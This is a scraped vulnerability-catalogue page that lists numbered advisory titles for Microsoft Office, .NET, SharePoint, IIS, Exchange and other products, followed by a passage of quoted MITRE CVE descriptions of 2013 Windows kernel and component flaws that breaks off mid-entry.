Compatibility Pack/Word 2003 SP3/2007 SP3 File memory corruption [11494] Microsoft .NET Framework 2.0 SP2/3.5.1/4/4.5/4.5.1 MAC Authentication privilege escalation [11468] Microsoft Exchange 2010/2013 cross site scripting [11466] Microsoft Office 2013 File Response information disclosure [11457] Microsoft SharePoint Server/Office Web Apps 2010 SP1/2010 SP2/2013 W3WP Service Account privilege escalation [11448] Microsoft Office 2007/2010 Address Space Layout Randomization privilege escalation [11230] Microsoft Word 2003 DOC Document denial of service [11151] Microsoft Outlook -/2007/2010/2013 S/MIME Certificate Metadata Expansion information disclosure [11149] Microsoft Office -/2003/2007/2010/2013 WordPerfect Document epsimp32.flt memory corruption [11148] Microsoft Office 2003/2007 WordPerfect Document epsimp32.flt memory corruption [11146] Microsoft Office 2003/2007 epsimp32.flt memory corruption [10648] Microsoft Word 2007 Word File memory corruption [10647] Microsoft Word 2003 Word File memory corruption [10643] Microsoft SharePoint Server 2007/2010/2013 Input Sanitizer memory corruption [10642] Microsoft SharePoint Server 2007/2010 Content Display in Frames privilege escalation [10640] Microsoft .NET Framework up to 4.5 JSON Data privilege escalation [10639] Microsoft .NET Framework up to 4.5 XML External Entity privilege escalation [10250] Microsoft SharePoint Server up to 2013 W3WP Process privilege escalation [10249] Microsoft SharePoint 2010/2003/2007/2.0/3.0 Workflow privilege escalation [10248] Microsoft SharePoint Server up to 2013 cross site scripting [10247] Microsoft SharePoint Server 2007/2010/2013 Online Cloud cross site scripting [10245] Microsoft Office 2003/2007/2010 Word File memory corruption [10244] Microsoft Office 2003 SP3 Word File memory corruption [10243] Microsoft Office 2003/2007 Word File memory corruption [10242] Microsoft Office 2007 Word File memory corruption [10241] Microsoft Office 2007 Word File memory corruption [10240] Microsoft Office 2003/2007/2010 Word File memory corruption [10239] Microsoft Office 2003/2007 Word File memory corruption [10238] Microsoft Excel 2003/2007 XML External Entity Data memory corruption [10237] Microsoft Excel 2003/2007/2010 XML External Entity Data privilege escalation [10236] Microsoft Word/Office 2003/2007 XML External Entity Data information disclosure [10235] Microsoft Excel/Office/SharePoint Office File memory corruption [10234] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10233] Microsoft Word/Sharepoint Office File memory corruption [10232] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10231] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10230] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10229] Microsoft Access 2007/2010/2013 Access File memory corruption [10228] Microsoft Access 2007/2010/2013 Access File memory corruption [10227] Microsoft Access 2007/2010/2013 Access File memory corruption [10189] Microsoft Outlook 2007/2010 S/MIME denial of service [9715] Microsoft PowerPoint 2007 DirectShow Runtime quartz.dll GetMaxSampleSize memory corruption [9558] Novell GroupWise Client up to 2012 12.0.1 HP1 on Windows Javascript/Active X Script cross site scripting [9397] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Array privilege escalation [9395] Microsoft .NET Framework up to 4.5 Object Delegation privilege escalation [9394] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 on 64-bit Array privilege escalation [9393] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Permission privilege escalation [9392] Microsoft .NET Framework up to 4.5 Permission privilege escalation [9189] Microsoft Outlook S/MIME weak encryption [8747] Microsoft Malware Protection Engine 1.1.9402.0 File Scan memory corruption [8737] Microsoft Word 2003 SP3 Shape Data Parser privilege escalation [8725] Microsoft Lync 2010/2013 memory corruption [8724] Microsoft .NET Framework 4.5 WCF Authentication Endpoint Setup weak authentication [8723] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 XML File privilege escalation [8206] Microsoft SharePoint Server 2010 SP1 HTML Sanitization Component cross site scripting [8200] Microsoft SharePoint Server 2013 ACL privilege escalation [8172] Microsoft Skype up to 6.2.0.106 unknown vulnerability [7981] FFmpeg up to 1.1.3 Microsoft RLE Data msrledec.c msrle_decode_8_16_24_32 memory corruption [7971] Microsoft Office for Mac 2011 up to 14.3.1 on Mac HTML5 Mail Message Parser information disclosure [7968] Microsoft SharePoint Server 2010 SP1 Input Validator memory corruption [7967] Microsoft SharePoint Server 2010 SP1 User Account directory traversal [7966] Microsoft SharePoint Server 2010 SP1 cross site scripting [7965] Microsoft SharePoint Server 2010 SP1 User Account Callback privilege escalation [7642] Microsoft Exchange 2007/2010 Outlook Web Access vspdx.dll) memory corruption [7343] Microsoft Lync 2012 HTTP Format String [7259] Microsoft .NET Framework 3.5/3.5 SP1/3.5.1/4 Replace privilege escalation [7256] Microsoft .NET Framework up to 4.5 XBAP privilege escalation [7255] Microsoft .NET Framework up to 4.5 System.DirectoryServices.Protocolsb Method memory corruption [7254] Microsoft .NET Framework up to 4.5 XAML Browser Application memory corruption [7253] Microsoft .NET Framework up to 4.5 Code Access Security information disclosure [7230] Microsoft Excel 2010 SP1 on 32-bit XLS File denial of service [7209] NetIQ eDirectory up to 8.8.7.1 on Windows HTTP Request denial of service [7121] Microsoft Exchange 2007/2010 RSS Feed privilege escalation [7056] FreeSSHD 1.2.1/1.2.2/1.2.6 on Windows Authentication freeSSHd.exe weak authentication [6969] Adobe ColdFusion 10.0 on Windows denial of service [6935] Microsoft Office Excel 2003/2007/2010 Input Sanitizer memory corruption [6934] Microsoft Office Excel 2003/2007/2010 Input Sanitizer memory corruption [6933] Microsoft Office Excel 2003/2007/2010 SerAuxErrBar memory corruption [6930] Microsoft .NET Framework 4.0/4.5 Reflection Optimization Object Permission privilege escalation [6929] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Web Proxy Setting Auto-Discovery privilege escalation [6928] Microsoft .NET Framework up to 4 Path Subversion Libraries privilege escalation [6927] Microsoft .NET Framework 2.0 SP2/3.5.1 Trusted Code Function information disclosure [6926] Microsoft .NET Framework 1.0 SP3/1.1 SP1/2.0 SP2/3.5.1/4 Object Permission Handller privilege escalation [6925] Microsoft IIS 7.0/7.5 FTP Command information disclosure [6924] Microsoft IIS 7.5 Log File Permission information disclosure [6918] Microsoft Excel 2007 SP2 Input Sanitizer memory corruption [6831] Microsoft Office Picture Manager 2010 File memory corruption [6830] Microsoft Word 2007/2010 File memory corruption [6819] Microsoft Excel 2007 File memory corruption [6626] Microsoft SharePoint/Lync/Infopath 2007/2010 HTML Sanitization cross site scripting [6624] Microsoft SQL Server up to 2012 Report Manager cross site scripting [6622] Microsoft Word -/2003/2007/2010 RTF Document denial of service [6621] Microsoft Word 2007 PAPX privilege escalation [6563] Novell GroupWise 2012/8.0/8.00/8.01/8.02 Client for Windows memory corruption [5945] Microsoft Office 2007/2010 memory corruption [5933] Microsoft SQL Server 2000/2005/2008/2008 R2 Common Controls TabStrip ActiveX MSCOMCTL.OCX privilege escalation [5932] Microsoft Office 2003/2007/2010 Common Controls TabStrip ActiveX MSCOMCTL.OCX privilege escalation [5906] Citrix Access Gateway Plugin up to 9.3.49.5 on Windows nsepa.exe StartEPA memory corruption [5649] Microsoft Office 2003/2007/2010 libraries privilege escalation [5645] Microsoft SharePoint 2007/2010/3.0 Reflected cross site scripting [5644] Microsoft SharePoint 2010 scriptesx.ashx cross site scripting [5643] Microsoft SharePoint 2007/2010 privilege escalation [5642] Microsoft SharePoint 2007 privilege escalation [5641] Microsoft SharePoint 2010 cross site scripting [5636] Microsoft Outlook Web App up to 14.1.287.0 owa/redir.aspx weak authentication [5623] Microsoft IIS up to 7.5 File Name Tilde privilege escalation [5518] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 privilege escalation [5474] Microsoft WordPad 5.1 DOC Document denial of service [5445] Symantec Endpoint Protection up to 11.0 RU7 MP1 on Windows Server 2003 Network Threat Protection Module denial of service [5368] Microsoft .NET Framework up to 4 privilege escalation [5367] Microsoft .NET Framework up to 4 privilege escalation [5362] Microsoft Office 2003/2007 GDI+ privilege escalation [5360] Microsoft .NET Framework 4 memory corruption [5291] Microsoft Visual Studio 2008 Incremental Linker link.exe ConvertRgImgSymToRgImgSymEx Integer Coercion Error [5268] Microsoft Office 2008 on Mac RTF Pfragment File memory corruption [5080] Microsoft SQL Server 2005/2008/2008R2 CREATE DATABASE sql injection [5050] Microsoft Office 2007 WPS Converter memory corruption [5049] Microsoft SQL Server 2000/2005/2008 MSCOMCTL.OCX privilege escalation [5048] Microsoft Office 2003/2007/2010 MSCOMCTL.OCX privilege escalation [5047] Microsoft .NET Framework up to 4.5 Parameter Validator privilege escalation [5022] Novell GroupWise 2.1.0 on Windows/Linux/NetWare Messenger nmma.exe login memory corruption [5021] Novell GroupWise 2.1.0 on Windows/Linux/NetWare Messenger nmma.exe createsearch memory corruption [4941] Microsoft Security Essentials Antimalware Engine CAB File Parser privilege escalation [4919] Microsoft Security Essentials Antimalware Engine TAR File Parser privilege escalation [4642] Microsoft .NET Framework 2.0 SP2/3.5.1/4 XAML Browser Application privilege escalation [4640] Microsoft SharePoint 2010 inplview.aspx cross site scripting [4636] Microsoft SharePoint 2010 wizardlist.aspx cross site scripting [4635] Microsoft SharePoint 2010 themeweb.aspx cross site scripting [4509] Microsoft .NET Framework 1.1 SP1/2.0 SP2/3.5 SP1/3.5.1/4.0 Forms Authentication Ticket Caching privilege escalation [4508] Microsoft .NET Framework 1.1 SP1/2.0 SP2/3.5 SP1/3.5.1/4.0 Username Parser privilege escalation [4507] Microsoft .NET Framework 2.0 SP2/3.5 SP1/3.5.1/4.0 Forms Authentication privilege escalation [4506] Microsoft .NET Framework 1.1 SP1/2.0 SP2/3.5 SP1/3.5.1/4.0 ASP.NET Hash denial of service [4482] Microsoft Word 2007/2010/2011 Document Parser denial of service [4480] Microsoft Excel 2003 privilege escalation [4477] Microsoft PowerPoint 2007 SP2/2008 OfficeArt privilege escalation [4473] Microsoft PowerPoint 2007 SP2/2010 DLL-Loader privilege escalation [4471] Microsoft Office 2003/2007 Publisher privilege escalation [4470] Microsoft Office 2003 SP3 privilege escalation [4469] Microsoft Office Publisher privilege escalation [4453] Microsoft Excel 2003 Record Parser privilege escalation [4446] Microsoft Office 2007/2008 OfficeArt Record Parser privilege escalation [4445] Microsoft Office 2007/2010/2011 Word Document Parser denial of service [4414] Microsoft SharePoint 2010 cross site scripting [4413] Microsoft SharePoint 2010/2007/3.0 XML/XLS information disclosure [4412] Microsoft Office 2003/2007 Library Loader privilege escalation [4411] Microsoft Excel 2003 denial of service [4397] Microsoft .NET Framework 3.5 SP1/4.x Chart Control information disclosure [4391] Microsoft .NET Framework 2.0 SP2/3.5.1/4 Socket Restriction information disclosure [4370] Microsoft .NET Framework up to SP2 Array privilege escalation [4369] Microsoft Excel 2002/2003/2007 privilege escalation [4349] Microsoft Office 2004/2007/2008 Presentation File Parser privilege escalation [4348] Microsoft PowerPoint 2002/2003/2007 privilege escalation [4334] Microsoft .NET Framework 2.0 SP2/3.5 SP1/3.5.1/4.0 JIT Compiler privilege escalation [4332] Microsoft PowerPoint 2007/2010 privilege escalation [4289] Microsoft Excel 2007 Shape Data Parser denial of service [4286] Microsoft PowerPoint 2002 SP3/2003 SP3/2004/2007 SP2/2008 OfficeArt Container Parser privilege escalation [4246] Oracle Database Server 11.1.0.7/11.2.0.1 on Windows Cluster Verify Utility unknown vulnerability [4234] Microsoft IIS 7.5 FTP Server memory corruption [4230] Microsoft Exchange 2007 on 64-bit RPC store.exe denial of service [4229] Microsoft SharePoint 2007 Document Conversion Launcher Service unknown vulnerability [4200] Microsoft .NET Framework 4.0 on 64-bit JIT Compiler privilege escalation [4197] Microsoft SharePoint 2007/3.0 cross site scripting [4196] Microsoft Word 2002/2003/2007/2010 memory corruption [4186] Microsoft Outlook 2002/2003/2007 Content Parser memory corruption [4180] Microsoft IIS 5.1/6.0/7.0/7.5 memory corruption [4179] Microsoft IIS 7.5 FastCGI memory corruption [4159] Microsoft Excel 2002/2003 SXDB PivotTable privilege escalation [4146] Microsoft Outlook 2002/2003/2007 SMB Attachment PR_ATTACH_METHOD privilege escalation [4145] Microsoft Access 2003/2007 ActiveX ACCWIZ.dll privilege escalation [4133] Microsoft Office 2003/2007/Xp COM Object Instantiator privilege escalation [4125] Microsoft SharePoint 2007/3.0 help.aspx cross site scripting [4090] Microsoft Excel 2002/2003/2007 privilege escalation [4082] Microsoft PowerPoint 2002 SP3 memory corruption [4074] Microsoft IIS 5.0/5.06/5.1/6.0 ASP privilege escalation [4069] Microsoft Project 2003/2007 Project Memory Validator denial of service [4057] Microsoft Excel memory corruption [4056] Microsoft Word 2002/2003 File Information Block Parser memory corruption [4024] Microsoft IIS 5.0/6.0/7.0 FTP Server denial of service [4000] Microsoft Office 2003/Sp3/Xp Web Components privilege escalation [3999] Microsoft Office 2007 Pointer privilege escalation [3974] Microsoft PowerPoint 2000/2002/2003 Sound Data memory corruption [3973] Microsoft PowerPoint 2000/2002/2003 Notes Container memory corruption [3972] Microsoft PowerPoint 2000/2002/2003 BuildList memory corruption [3971] Microsoft PowerPoint 2000/2002/2003 Object memory corruption [3970] Microsoft PowerPoint 2000/2002/2003 Paragraph memory corruption [3969] Microsoft PowerPoint 2000/2002/2003 Atom memory corruption [3952] Microsoft ISA Server 2004/2006 denial of service [3946] Microsoft PowerPoint 2000/2002/2003/2004 privilege escalation [3932] Microsoft Excel 2000/2002/2003/2004/2007 Object Reference privilege escalation [3896] Microsoft SQL Server up to 2005 sp_replwritetovarbin memory corruption [3892] Microsoft Excel 2000/2002/2003 Formula denial of service [3891] Microsoft Excel 2000/2002/2003 denial of service [3890] Microsoft Excel 2000/2002/2003 NAME Index denial of service [3889] Microsoft Word 2000/2002/2003/2007 Table Property memory corruption [3888] Microsoft Word 2000/2002/2003/2007 RTF Stylesheet denial of service [3887] Microsoft Word 2000/2002/2003/2007 denial of service [3886] Microsoft Word 2000/2002/2003/2007 ControlWord memory corruption [3885] Microsoft Word 2000/2002/2003/2007 denial of service [3884] Microsoft Word 2000/2002/2003/2007 denial of service [3883] Microsoft Word 2000/2002/2003/2007 RTF memory corruption [3882] Microsoft Word 2000/2002/2003/2007 LFO privilege escalation [3844] Microsoft Excel 2003 REPT Numeric Error [3843] Microsoft Excel up to 2007 BIFF File denial of service [3842] Microsoft Excel 2003 VBA Performance Cache denial of service [3841] Microsoft Office Xp CDO URI cross site scripting [3799] Microsoft Visual Studio 6 Masked Edit Control memory corruption [3796] Microsoft Office 2000 WPG privilege escalation [3795] Microsoft Office 2000/2003/Xp BMP Image BMPIMP32.FLT denial of service [3794] Microsoft Office 2000/2003/Xp PICT bits_per_pixel denial of service [3793] Microsoft Office 2000/2003/Xp PICT denial of service [3792] Microsoft Office 2000 EPS File privilege escalation [3783] Microsoft Word 2002 denial of service [3782] Microsoft SQL Server Statement Numeric Error [3781] Microsoft SQL Server Database Backup File memory corruption [3780] Microsoft SQL Server Query Type Conversion memory corruption [3779] Microsoft SQL Server Memory Page Reuse information disclosure [3778] Microsoft Exchange 2003/2007 Outlook Web Access cross site scripting [3701] Microsoft Word 2003 CSS privilege escalation [3700] Microsoft Word 2003 RTF Document privilege escalation [3649] Microsoft Office up to XP privilege escalation [3648] Microsoft Excel 2003 privilege escalation [3647] Microsoft Outlook up to 2007 mailto URI privilege escalation [3552] Microsoft Excel 2000/2002/2003 File memory corruption [3491] Microsoft Web Proxy Auto-Discovery Feature unknown vulnerability [3373] Microsoft Word 2000/2002 privilege escalation [3309] Microsoft Visual Studio 6 ActiveX Control VBTOVSI.dll directory traversal [3308] Microsoft Visual Studio 6 ActiveX Control PDWizard.ocx directory traversal [3241] Microsoft Excel 2000/2003/2004/XP SP3 rtWnDesk memory corruption [3176] Microsoft Excel 2000/2002/2003/2007 File Attribute memory corruption [3175] Microsoft Excel 2000/2002/2003/2007 Active Worksheet memory corruption [3174] Microsoft Excel 2000/2002/2003/2007 Version Information memory corruption [3172] Microsoft Office Publisher 2007 Pointer denial of service [3067] Microsoft Office 2000/2003/2004/2007/Xp Drawing Object denial of service [3065] Microsoft Excel 2000/2002/2003/2007 Filter memory corruption [3064] Microsoft Excel 2000/2002/2003/2004/2007 set Font memory corruption [3063] Microsoft Excel 2000/2002/2003/2007 BIFF Record memory corruption [3053] Microsoft Excel Viewer 3.x OCX ActiveX Control memory corruption [3050] Microsoft Word Viewer 3.x OCX ActiveX Control memory corruption [3049] Microsoft PowerPoint Viewer 3.x OCX ActiveX Control memory corruption [3048] Microsoft Excel Viewer 3.x OCX ActiveX Control memory corruption [2939] Microsoft Word 2000 memory corruption [2894] Microsoft Office 2000/2003/2004/Xp Undefined String Format String [2884] Microsoft Word 2000/2002/2003 memory corruption [2810] Microsoft Outlook 2000/2002/2003 Office Saved Search memory corruption [2809] Microsoft Outlook 2000/2002/2003 Header denial of service [2808] Microsoft Outlook 2000/2002/2003 Meeting denial of service [2807] Microsoft Excel 2000/2002/2003 XLS File privilege escalation [2765] Microsoft Project Server 2003 pdsrequest.asp weak authentication [2718] Microsoft Word 2000/2002/2003 DOC Document memory corruption [2695] Alt-N MDaemon 9.0.5/9.0.6/9.51/9.53 on Windows privilege escalation [2610] Microsoft PowerPoint 2003 PPT Document denial of service [2597] Microsoft Office 2003/Xp Smart-Tag Parser memory corruption [2596] Microsoft Office 2000/2003/2004/Xp Value Read privilege escalation [2595] Microsoft Office 2000/2001/2003/2004 Diagram Value privilege escalation [2594] Microsoft Office 2000/2001/2003/2004 Document memory corruption [2571] Microsoft PowerPoint up to 2003 Document privilege escalation [2554] Microsoft PowerPoint 2000 memory corruption [2508] Microsoft Word 2000 memory corruption [2452] Apache HTTP Server up to 2.2.3 on Windows mod_alias unknown vulnerability [2437] Microsoft Office up to XP Filename memory corruption [2383] Citrix MetaFrame 1.8/3.0 on Windows Registry Permission privilege escalation [2382] Microsoft PowerPoint up to 2003 Presentation Open/Close memory corruption [2378] Microsoft PowerPoint 2000/2002/2003 Document Parser memory corruption [2367] Microsoft Office 2000/2003/XP Document String privilege escalation [2365] Microsoft Office 2000/2003/XP PNG Image memory corruption [2364] Microsoft Office 2000/2003/XP GIF Image memory corruption [2357] Microsoft Excel up to 2003 on Asian System Document Repair Style memory corruption [2349] Novell GroupWise up to 7.0 on Windows API Email unknown vulnerability [2325] Microsoft Excel up to 2003 Hyperlink hlink.dll memory corruption [2324] Microsoft Excel 2000/2002/2003/2004 XLS File memory corruption [2312] Microsoft Exchange 2000 Outlook Web Access cross site scripting [2308] Microsoft PowerPoint 2000/2002/2003/2004 PPT Document memory corruption [2294] Microsoft Word up to 2003 DOC Document privilege escalation [2263] Cisco VPN Client up to 4.8.01.0300 on Windows privilege escalation [2253] Microsoft Word up to 2003 privilege escalation [2217] Microsoft Exchange 2000/2003 Calender Collaboration Data Object memory corruption [2190] Microsoft Office 2003 mailto URI unknown vulnerability [2084] Microsoft Excel 95/97/2000/2002/2003 File memory corruption [2083] Microsoft Office up to XP Routing Slip memory corruption [2075] Microsoft Visual Studio 6 dbp File memory corruption [2053] Microsoft Office/Visio/Project 2003 Korean Input Method Editor privilege escalation [2052] Microsoft PowerPoint 2000 HTML Rendering information disclosure [1975] PostgreSQL up to 8.1.1 on Windows Multiple Connection denial of service [1971] Microsoft Visual Studio 2005 Form Loader load memory corruption [1964] Microsoft Exchange 5/5.5/2000 Email memory corruption [1963] Microsoft Outlook 2000/2002/2003 TNEF MIME Attachment Integer Coercion Error [1947] PHP 4.3.10/4.4.0/4.4.1/4.4.2 on Windows mysql_connect memory corruption [1928] Microsoft IIS 5.1 Virtual Directory privilege escalation [1790] Microsoft Exchange 2000 SMTP Collaboration Data Object memory corruption [1737] Microsoft Exchange 2003 IMAP4 Service Store.exe denial of service [1704] Microsoft IIS 5.1/6 privilege escalation [1699] Veritas Backup Exec up to 8.6 on Windows unknown vulnerability [1697] Novell eDirectory 8.7.3 on Windows iMonitor memory corruption [1669] Microsoft Word 2000 Shared Sections denial of service [1668] Microsoft PowerPoint 2000 Shared Sections denial of service [1667] Microsoft Outlook 2000 Shared Sections denial of service [1666] Microsoft Office 2000 Shared Sections denial of service [1665] Microsoft Excel 2000 Shared Sections denial of service [1664] Microsoft Access 2000 Shared Sections denial of service [1644] Sun MySQL up to 4.1.9 on Windows denial of service [1597] Microsoft Word 2000/2002 Font Parser memory corruption [1571] Microsoft Exchange 5.5 Outlook Web Access cross site scripting [1351] Microsoft Exchange 2000/2003 SMTP Service memory corruption [1348] Microsoft MSN Messenger up to 7.0beta GIF Image memory corruption [1273] Sun MySQL up to 4.1.9 on Windows MS DOS Device Name denial of service [1269] Microsoft Exchange 2003 Sub-Directories Store.exe denial of service [1210] IBM DB2 up to 8.1 FP8 on Windows unknown vulnerability [1192] Microsoft Office 2000/2002/XP URL memory corruption [1188] Microsoft Exchange 2003 Outlook Web Access owalogon.asp information disclosure [1154] Microsoft Office RC4 IV unknown vulnerability [981] Microsoft Proxy Server/ISA Server up to 2000 DNS Revese Lookup Cache weak authentication [961] Microsoft ISA Server HTTP Keep-Alive weak authentication [881] Microsoft Excel 2000/2001/2002 memory corruption [877] Microsoft Word 2002 DOC Document denial of service [865] IBM DB2 Universal Database 7.x/8.x on Windows memory corruption [857] Microsoft SQL Server up to 7.0 SP4 memory corruption [832] Microsoft WordPerfect memory corruption [783] Microsoft Exchange 5.5 Outlook Web Access HTML Redirection cross site scripting [762] Microsoft IIS 4.0 Redirect memory corruption [751] Microsoft Word Email privilege escalation [705] Microsoft ISA Server 2000 SP2 Web Proxy denial of service [704] Microsoft ISA Server 2000 SP2 Web Proxy privilege escalation [703] Microsoft ISA Server 2000 SP2 Web Proxy denial of service [702] Microsoft ISA Server 2000 SP2 External HTTP Traffic weak encryption [701] Microsoft ISA Server 2000 SP2 ICMP unknown vulnerability [700] Trend Micro OfficeScan up to Corporate 5.58 Windows Help unknown vulnerability [694] PHP up to 4.3.6 on Windows escapeshellcmd/escapeshellarg privilege escalation [663] Microsoft Outlook 2003 RTF Document OLE Object containing privilege escalation [652] Microsoft Outlook 2003 HTML Mail Reply privilege escalation [649] Microsoft IIS information disclosure [574] Trend Micro VirusWall up to 3.52 Build1466 on Windows /ishttpd/localweb/java/ directory traversal [553] Microsoft Messenger 6.0/6.1 File Request information disclosure [551] Microsoft Outlook 2002/XP mailto cross site scripting [479] Microsoft Exchange 2003 Outlook Web Access information disclosure [477] Microsoft ISA Server 2000 H.323 Filter memory corruption [476] Microsoft ISA Server 2000 H.323/H.225.0/Q.931 memory corruption [467] Microsoft IIS up to 6.0 privilege escalation [459] Microsoft IIS 5.0 Configuration [419] Microsoft Exchange 2003 Outlook Web Access information disclosure [407] Microsoft Messenger up to 6.0 MSG Message unknown vulnerability [385] Microsoft Excel up to 2002 Macro Security memory corruption [384] Microsoft Word 97/98/2000/2002 Macro Name memory corruption [334] Microsoft Exchange 5.5 Outlook Web Access cross site scripting [333] Microsoft Exchange 5.5/2000 SMTP Service memory corruption [307] IBM DB2 Universal Database 7.x on Windows INVOKE memory corruption [263] Microsoft Word 97/98/2000/2002 Macro privilege escalation [262] Microsoft Office 97/2000/XP HTML memory corruption [244] Sun MySQL 3/4 on Windows my.ini weak encryption [233] Microsoft IIS 4.0/5.0/5.1 /.asp unknown vulnerability [199] Microsoft MSDE/SQL Server 2000 LPC memory corruption [198] Microsoft SQL Server 7/2000 Named Pipe privilege escalation [197] Microsoft MSDE/SQL Server 7/2000 Named Pipe Session privilege escalation [190] Microsoft IIS 6.0 Admin Interface weak authentication [189] Microsoft IIS 6.0 Admin Interface weak authentication [187] Microsoft IIS 6.0 Admin Interface cross site scripting [183] Microsoft Messenger 6.0 Build 6.0.0501 Image Transfer memory corruption [177] Microsoft ISA Proxy 2000 Error Site cross site scripting [173] Microsoft SQL Server 7/2000 Index.PHP memory corruption [159] Microsoft SQL Server on Win NT/2000/XP Named Pipe xp_fileexist unknown vulnerability [157] Microsoft Exchange 5.5/2000 HTML Attachment cross site scripting [86] Microsoft IIS 5.0/5.1 WebDAV denial of service [85] Microsoft IIS 4.0/5.0 ASP Response.AddHeader memory corruption [84] Microsoft IIS 5.0 Server Side Includes SSINC.DLL memory corruption [83] Microsoft IIS 4.0/5.0/5.1 Error Message cross site scripting [82] Microsoft IIS 4.0/5.0 nsiislog.dll denial of service [62] Microsoft .NET Framework Passport unknown vulnerability [43] Microsoft Outlook Express MHTML memory corruption [15] Microsoft IIS 5.0 WebDav memory corruption [12] Microsoft Outlook 2000/Express 6 window.PopUp privilege escalation MITRE CVE - https://cve.mitre.org: [CVE-2013-3661] The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not check whether linked-list traversal is continually accessing the same list member, which allows local users to cause a denial of service (infinite traversal) via vectors that trigger a crafted PATHRECORD chain. [CVE-2013-3660] The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 does not properly initialize a pointer for the next object in a certain list, which allows local users to obtain write access to the PATHRECORD chain, and consequently gain privileges, by triggering excessive consumption of paged memory and then making many FlattenPath function calls, aka "Win32k Read AV Vulnerability." [CVE-2013-3174] DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted GIF file, aka "DirectShow Arbitrary Memory Overwrite Vulnerability." [CVE-2013-3173] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overwrite Vulnerability." [CVE-2013-3172] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to cause a denial of service (system hang) via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-3167] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." [CVE-2013-3154] The signature-update functionality in Windows Defender on Microsoft Windows 7 and Windows Server 2008 R2 relies on an incorrect pathname, which allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory, aka "Microsoft Windows 7 Defender Improper Pathname Vulnerability." [CVE-2013-3138] Integer overflow in the TCP/IP kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (system hang) via crafted TCP packets, aka "TCP/IP Integer Overflow Vulnerability." [CVE-2013-3136] The kernel in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 on 32-bit platforms does not properly handle unspecified page-fault system calls, which allows local users to obtain sensitive information from kernel memory via a crafted application, aka "Kernel Information Disclosure Vulnerability." [CVE-2013-3127] The Microsoft WMV video codec in wmv9vcm.dll, wmvdmod.dll in Windows Media Format Runtime 9 and 9.5, and wmvdecod.dll in Windows Media Format Runtime 11 and Windows Media Player 11 and 12 allows remote attackers to execute arbitrary code via a crafted media file, aka "WMV Video Decoder Remote Code Execution Vulnerability." [CVE-2013-2558] Unspecified vulnerability in Microsoft Windows 8 allows remote attackers to cause a denial of service (reboot) or possibly have unknown other impact via a crafted TrueType Font (TTF) file, as demonstrated by the 120612-69701-01.dmp error report. [CVE-2013-2556] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR protection mechanism via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2554] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR and DEP protection mechanisms via unknown vectors, as demonstrated against Firefox by VUPEN during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0787. [CVE-2013-2553] Unspecified vulnerability in the kernel in Microsoft Windows 7 allows local users to gain privileges via unknown vectors, as demonstrated by Nils and Jon of MWR Labs during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0912. [CVE-2013-2552] Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows 8 allows remote attackers to bypass the sandbox protection mechanism by leveraging access to a Medium integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-1345] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Vulnerability." [CVE-2013-1340] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Dereference Vulnerability." [CVE-2013-1339] The Print Spooler in Microsoft 